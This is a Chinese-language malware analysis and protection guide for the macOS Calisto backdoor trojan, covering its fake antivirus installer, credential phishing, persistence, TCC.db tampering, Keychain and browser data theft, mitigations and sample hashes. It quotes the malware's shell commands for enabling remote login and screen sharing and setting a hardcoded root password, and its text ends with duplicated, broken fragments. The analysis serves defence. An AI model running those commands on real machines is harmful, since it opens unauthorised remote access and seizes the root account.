macOS Calisto木马深入分析与防护指南<\/h1>

一、Calisto木马概述<\/h2>
Calisto是macOS平台上的一个后门木马，可能是Proto恶意软件家族的第一个成员。该恶意软件最早于2016年被上传到VirusTotal，但直到2018年5月才被发现，期间两年未被反病毒软件检测到。<\/p>

二、传播方式<\/h2>

伪装形式<\/strong>：未签名的DMG镜像文件<\/li>
伪装对象<\/strong>：Intego安全软件的Mac版本（特别选择第9版）<\/li>

欺骗手段<\/strong>：界面设计与正版软件高度相似，普通用户难以辨别<\/li> <\/ul>
三、安装过程分析<\/h2>

虚假许可协议<\/strong>：显示与Intego不同的许可协议文本（可能使用旧版本协议）<\/li>
凭证收集<\/strong>：要求用户输入用户名和密码（模仿正常软件安装流程）<\/li>
错误诱导<\/strong>：安装过程中故意挂起并报错，建议用户从官网下载新安装包<\/li>
后台活动<\/strong>：在用户认为安装失败时，木马已在后台运行<\/li> <\/ol>
四、技术特性分析<\/h2>
1. SIP（系统完整性保护）相关行为<\/h3>

SIP开启时<\/strong>：<\/p>

活动受限（因开发时未充分考虑2015年发布的SIP机制）<\/li>
尝试修改系统文件时会失败并停止运行<\/li> <\/ul> <\/li>

SIP关闭时<\/strong>：<\/p>

复制自身到\/System\/Library\/<\/code>目录<\/li>
设置开机自启动<\/li>
卸载DMG镜像<\/li>
加入无障碍服务<\/li>
收集额外系统信息<\/li>
开启系统远程访问权限<\/li>
转发数据到C2服务器<\/li> <\/ul> <\/li> <\/ul> 2. 持久化技术<\/h3> 启动项添加<\/strong>：在\/Library\/LaunchAgents\/<\/code>创建.plist文件<\/li> DMG卸载命令<\/strong>：hdiutil detach \/Volumes\/MacInternetSecurityX9<\/code><\/li> <\/ul> 3. 权限提升技术<\/h3> TCC.db修改<\/strong>：直接修改该文件将自己加入无障碍服务（无需用户交互）<\/li> 远程访问配置<\/strong>： systemsetup -setremotelogin on launchctl load -w \/System\/Library\/LaunchDaemons\/com.apple.screensharing.plist dscl . -create \/Groups\/com.apple.access_ssh dscl . -append \/Groups\/com.apple.access_ssh user <username> dscl . -passwd \/Users\/root aGNOStIC7890!!! <\/code><\/pre> <\/li> <\/ul> 4. 数据收集功能<\/h3> 存储位置<\/strong>：.calisto<\/code>隐藏目录<\/li> 收集内容<\/strong>： Keychain存储数据（包括Safari保存的密码和token）<\/li> 用户登录密码窗口数据<\/li> 网络连接信息<\/li> Google Chrome数据（历史记录、书签、Cookie）<\/li> <\/ul> <\/li> <\/ul> 5. 未使用功能<\/h3> 加载处理USB设备的kernel扩展<\/li> 从用户目录窃取数据<\/li> 系统自毁功能<\/li> <\/ul> 五、与Backdoor.OSX.Proton的关联<\/h2> 相似点<\/strong>：<\/p> 都伪装成知名反病毒软件<\/li> 样本中包含com.proton.calisto.plist<\/code><\/li> 都能窃取大量个人数据（包括Keychain内容）<\/li> <\/ul> <\/li> 时间线<\/strong>：<\/p> Calisto：2016年检测到<\/li> Proton家族：2017年发现<\/li> 推测Calisto可能是Proton的早期版本或原型<\/li> <\/ul> <\/li> <\/ol> 六、防护措施<\/h2> 系统配置<\/strong>：<\/p> 保持SIP（系统完整性保护）开启状态<\/li> 定期更新操作系统<\/li> <\/ul> <\/li> 软件安装<\/strong>：<\/p> 仅从可信来源安装经过签名的软件<\/li> 优先选择App Store下载的应用程序<\/li> <\/ul> <\/li> 安全实践<\/strong>：<\/p> 使用反病毒软件<\/li> 警惕未签名DMG文件的安装<\/li> 注意软件安装过程中的异常行为<\/li> <\/ul> <\/li> 密码管理<\/strong>：<\/p> 定期检查系统root账户状态<\/li> 发现可疑密码修改立即采取措施<\/li> <\/ul> <\/li> <\/ol> 七、样本信息<\/h2> DMG镜像MD5<\/strong>：d7ac1b8113c94567be4a26d214964119<\/li> Mach-O可执行文件MD5<\/strong>：2f38b201f6b368d587323a1bec516e5d<\/li> <\/ul> 八、总结<\/h2> Calisto木马展示了macOS平台恶意软件的典型特征：利用用户信任、模仿合法软件、结合系统特性进行持久化。其技术虽然相对原始，但通过精心设计的欺骗手段仍能有效感染系统。保持系统默认安全设置、提高安全意识是防御此类威胁的关键。<\/p>

macOS Calisto木马深入分析与防护指南<\/h1>

一、Calisto木马概述<\/h2> Calisto是macOS平台上的一个后门木马，可能是Proto恶意软件家族的第一个成员。该恶意软件最早于2016年被上传到VirusTotal，但直到2018年5月才被发现，期间两年未被反病毒软件检测到。<\/p>

四、技术特性分析<\/h2>

一、Calisto木马概述<\/h2>
Calisto是macOS平台上的一个后门木马，可能是Proto恶意软件家族的第一个成员。该恶意软件最早于2016年被上传到VirusTotal，但直到2018年5月才被发现，期间两年未被反病毒软件检测到。<\/p>